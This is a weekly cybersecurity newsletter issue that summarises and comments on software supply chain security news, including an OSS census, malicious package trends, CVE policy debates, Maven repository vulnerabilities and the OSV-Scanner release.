• CramHacks
  • Posts
  • CramHacks Chronicles #71: Weekly Cybersecurity Newsletter!

CramHacks Chronicles #71: Weekly Cybersecurity Newsletter!

I have a new Job! OSS usage trends, us-east-1.com DNS insights, CVEs for EOL versions, Palantir's security practices, OSS health checks, OSV-Scanner v2.0.0-beta1

Author

Kyle Kelly
January 29, 2025

Happy Monday, all!

This week, I started my new position at GitHub šŸ„³. Given my passion (is passion just a more friendly word for obsession?) for software supply chain security, I couldnā€™t be more excited.

I feel wildly energized about work after being without a 9-5 job for over a month. I canā€™t help but wonder how long this will last, but hopefully, it will be a long time šŸ».

Newsletter 

Open Source Usage Trends and Security Challenges Revealed in New Study
The Linux Foundation has published Census III, its third study investigating the use of OSS. Key findings include:

  • 7% of Python developers still use Python 2.

  • Thereā€™s a recognized need for widespread usage of a standardized naming schema for software components (e.g., PURL).

  • Only a handful of contributors often maintain the most widely used projects. In 47 of the top 50 non-npm projects, 17% have one developer accounting for more than 80% of commits. This increases to 40% of projects when considering two developers accounting for more than 80% of commits.

Buying us-east-1[.]com: A Look at Securit and DNS Traffic
Most know us-east-1[.]com as an AWS data center region, but Gabriel Koo purchased the available domain in December 2021. This blog details observations from the more than 45,000 daily DNS queries. Fortunately, Gabriel is on the good side!

How Palantir Secures Source Control
Palantir has an ongoing series covering how it is improving its software supply chain security. The latest issue is #3 and covers commit signing, code review enforcement, GHE permission management, static code analysis, and their secure release flow.

šŸ‘‹ The in-house built workflows for commit signing and validation were most interesting to me. Developers must use a YubiKey with touch policy enforced to sign all commits, which are validated before allowing a PR to be merged.

CVEs for End of Life?
The Node.JS project recently announced they would issue a CVE for end-of-life versions. My opinion is below, but I enjoyed reading Josh Bresserā€™s take on the different perspectives, packed full of relatable comedy.

šŸ‘‹ This goes against CVE rules, which concludes my opinion. I suspect that in 2025, we will see more controversial practices that will challenge the program (e.g., the Linux kernel assigning CVEs to all bug fixes).

Datadog threat roundup: top insights for Q4 2024
Based on the GuardDog scan results, Datadog found that 80% of malicious PyPI packages overwrote the setuptoolsā€™ setup() function. In addition, they report that 90% of malicious npm packages used pre or post-install scripts located in the package.json file.

šŸ‘‹ Great report! However, these statistics feel inflated for several reasons, the most obvious being that theyā€™re the easiest to find. Whatā€™s nice is that the latest release of ppm blocks these scripts by default! Additionally, Liran Tal released a blog post on npm best practices for handling pre- and post-install scripts.

Health Check-ups on OSS Projects: Managing Risks while Promoting (Re)use
Johan LinĆ„ker discusses takeaways from researching How to Assess the Health of Open Source Software dependencies in an Organizationā€™s Intake Process: Insights from an Interview-survey and Case Study.

šŸ‘‹ I havenā€™t had a chance to read this in depth, but Iā€™m excited to see research on this topic, a proposed solution, and a case study!

Curl Project: CVSS is dead to us
Curlā€™s Daniel Stenberg discusses how the project uses custom severity ratings and doesnā€™t include a CVSS score in CVE submissions. Thatā€™s all good and fine; however, itā€™s been pointed out that CISA as an ADP enriches CVEs with CVSS scores, basing the score on minimal context without much-needed expertise.

šŸ‘‹ Filippo Valsorda points out in a Bluesky thread that the Go Security team experiences the same problem.

Attacks on Maven proxy repositories
GitHub Security Labā€™s Michael Stepankin proves many vulnerabilities still exist in popular Maven package repositories Nexus, JFrog, and Reposilite. The CVEs reported in the blog target ā€˜proxy mode,ā€™ which stores and serves packages locally.

šŸ‘‹ Check out Michaelā€™s Ekoparty talk here!

OSV-Scanner v2.0.0-beta1 is ready!
šŸ‘‹ This was just announced, so I havenā€™t had time to experiment with it. However, layer-aware container scanning that supports Debian, Ubuntu, and Alpine container images sounds pretty sweet.

Until Next Time! šŸ‘‹

Hey, you made it to the bottom ā€“ thanks for sticking around!

Questions, ideas, or want to chat? Slide into my inbox! šŸ’Œ

Donā€™t hesitate to forward if someone could benefit from this.

See you next Monday!
-Kyle

P.S. CramHacks has a Supporter tier! You can upgrade here to support CramHacks and its free weekly content šŸ˜ƒ.